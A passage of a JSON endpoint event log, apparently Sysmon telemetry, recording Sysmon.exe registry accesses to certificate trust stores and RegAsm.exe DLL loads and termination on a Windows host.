"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868400000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570868400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\SysWOW64\\IPHLPAPI.DLL", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "bcrypt.dll", - "image_path": "C:\\Windows\\SysWOW64\\bcrypt.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868550000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", 
- "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 
131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust 
Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "process", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "subtype": "terminate", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 
131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "sfc_os.dll", - "image_path": "C:\\Windows\\SysWOW64\\sfc_os.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": 
"Certificates", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - 